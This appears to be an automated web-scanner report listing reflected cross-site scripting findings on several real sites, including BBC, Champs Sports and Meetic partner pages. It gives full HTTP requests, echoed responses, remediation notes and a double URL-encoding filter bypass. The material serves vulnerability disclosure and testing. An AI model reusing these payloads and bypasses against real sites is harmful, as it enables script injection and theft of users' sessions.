GET /worldservice/js/site_catalyst6f09e'-alert(1)-'3f555978f4d/s_code_bbcws.js?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Cache-Control: private, max-age=31536000 Date: Wed, 03 Aug 2011 11:42:18 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ad1'-alert(1)-'3c98025d146 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /worldservice/js/site_catalyst/s_code_bbcws.jse0ad1'-alert(1)-'3c98025d146?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Expires: Wed, 03 Aug 2011 11:42:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 03 Aug 2011 11:42:25 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding Set-Cookie: BBC-UID=347e8309f304b2a13c61d01581924402d7014862d0f0f2d192a8e044631c90880Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%206%2e1%3b%20en%2dUS%3b%20rv%3a1%2e9%2e2%2e13%29%20Gecko%2f20110504%20Namoroka%2f3%2e6%2e13; expires=Sun, 02-Aug-15 11:42:25 GMT; path=/; domain=bbc.co.uk;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55da3%252d%252d%253e1779cf3f641 was submitted in the REST URL parameter 4. This input was echoed as 55da3-->1779cf3f641 in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248755da3%252d%252d%253e1779cf3f641&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151671 Date: Tue, 02 Aug 2011 13:15:06 GMT Connection: close Set-Cookie: SSLC=web%2D45;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:06 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248755da3%2D%2D%3E1779cf3f641%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:06 GMT;path=/
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dca%2527%253balert%25281%2529%252f%252fed42f472d7a was submitted in the REST URL parameter 4. This input was echoed as 63dca';alert(1)//ed42f472d7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248763dca%2527%253balert%25281%2529%252f%252fed42f472d7a&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151836 Date: Tue, 02 Aug 2011 13:15:03 GMT Connection: close Set-Cookie: SSLC=web%2D41;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:03 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248763dca%27%3Balert%281%29%2F%2Fed42f472d7a%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:03 GMT;path=/
<!-- --> <HTML xmlns:fb="http://www.facebook.com/2008/fbml"> <HEAD> <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script> <!-- web-41 --> <script type="text/javas ...[SNIP]... <!-- try { document.domain = "champssports.com"; } catch(exc){} var cm_Attributes = null; var co_cd = '20'; var thecurrentsku = '0571248763dca';alert(1)//ed42f472d7a'; var cm_ProductTemplate = null; var cm_microsite = null; var cm_ClientID = '90102184';
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e179%2522%253balert%25281%2529%252f%252f9a08bb042a0 was submitted in the REST URL parameter 4. This input was echoed as 4e179";alert(1)//9a08bb042a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--057124874e179%2522%253balert%25281%2529%252f%252f9a08bb042a0&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151851 Date: Tue, 02 Aug 2011 13:15:00 GMT Connection: close Set-Cookie: SSLC=web%2D44;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:00 GMT;path=/ Set-Cookie: RECENTSKULIST=057124874e179%22%3Balert%281%29%2F%2F9a08bb042a0%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:00 GMT;path=/
<!-- --> <HTML xmlns:fb="http://www.facebook.com/2008/fbml"> <HEAD> <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script> <!-- web-44 --> <script type="text/javas ...[SNIP]... <script type="text/javascript"> var dtm_promo_id = "5"; var dtm_brand = "Nike"; var dtm_gender = "Women's"; var dtm_team = ""; var dtm_sku = "057124874e179";alert(1)//9a08bb042a0"; var dtm_img_url = "http://www.champssports.com/images/products/large_w/057124874e179";alert(1)//9a08bb042a0_w.jpg"; </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a4e"style%3d"x%3aexpression(alert(1))"599d441c396 was submitted in the REST URL parameter 4. This input was echoed as 74a4e"style="x:expression(alert(1))"599d441c396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248774a4e"style%3d"x%3aexpression(alert(1))"599d441c396&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 152217 Date: Tue, 02 Aug 2011 13:14:56 GMT Connection: close Set-Cookie: SSLC=web%2D43;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:14:56 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248774a4e%22style%3D%22x%3Aexpression%28alert%281%29%29%22599d441c396%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:14:56 GMT;path=/
The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6ad5'-alert(1)-'dc98966ff37 was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;0;[timestamp];M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 888a4'-alert(1)-'09c45d96d2 was submitted in the 645868;97831;0;[timestamp];M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f93'-alert(1)-'126beb4f879 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.171. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/645868/ishow23.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8248'-alert(1)-'61f5f4b6355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;109706383;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f36f5'%3balert(1)//fa7f3485bd6 was submitted in the 673819;97831;6525761750539601382;109706383;M;systemtarget parameter. This input was echoed as f36f5';alert(1)//fa7f3485bd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;247433133;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba096'%3balert(1)//f4996b0af5e was submitted in the 673819;97831;6525761750539601382;247433133;M;systemtarget parameter. This input was echoed as ba096';alert(1)//f4996b0af5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;392249101;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac38b'%3balert(1)//2aea9aa7199 was submitted in the 673819;97831;6525761750539601382;392249101;M;systemtarget parameter. This input was echoed as ac38b';alert(1)//2aea9aa7199 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;517804283;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9689'%3balert(1)//10e068cb7a5 was submitted in the 673819;97831;6525761750539601382;517804283;M;systemtarget parameter. This input was echoed as f9689';alert(1)//10e068cb7a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;877134046;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc8a8'%3balert(1)//420a2dc5e99 was submitted in the 673819;97831;6525761750539601382;877134046;M;systemtarget parameter. This input was echoed as bc8a8';alert(1)//420a2dc5e99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:51 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=bc8a8';alert(1)//420a2dc5e99http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.177. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/673819/show27.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d307'%3balert(1)//4f318aba3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d307';alert(1)//4f318aba3f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 712921;97831;6525761750539601382;512842640;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 807e5'%3balert(1)//5a3c5d05240 was submitted in the 712921;97831;6525761750539601382;512842640;M;systemtarget parameter. This input was echoed as 807e5';alert(1)//5a3c5d05240 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:03:54 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=807e5';alert(1)//5a3c5d05240http://www.meetic-partners.com/diff/58/712921/go126.asp?712921%3B97831%3B6525761750539601382%3B512842640%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.179. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/712921/show27.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e29'%3balert(1)//0a8e37c0325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54e29';alert(1)//0a8e37c0325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2b0e'-alert(1)-'20c938f2fb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]d2b0e'-alert(1)-'20c938f2fb/no?[countgo] HTTP/1.1 Host: www.meetic-partners.com Proxy-Connection: keep-alive Referer: http://dating.uk.msn.com/?articleid=10325 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:38:41 GMT Content-Length: 584
The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d69'-alert(1)-'bcda5d97f29 was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]f2d69'-alert(1)-'bcda5d97f29 HTTP/1.1 Host: www.meetic-partners.com Proxy-Connection: keep-alive Referer: http://dating.uk.msn.com/?articleid=10325 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:38:20 GMT Content-Length: 611
2.182. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d4e6'-alert(1)-'76bbbc117a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]&2d4e6'-alert(1)-'76bbbc117a2=1 HTTP/1.1 Host: www.meetic-partners.com Proxy-Connection: keep-alive Referer: http://dating.uk.msn.com/?articleid=10325 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:38:31 GMT Content-Length: 614
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff0a7'-alert(1)-'280b8200956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 836c5'-alert(1)-'8ada2bb0818 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 701ed'%3balert(1)//28f11ddf22f was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 701ed';alert(1)//28f11ddf22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
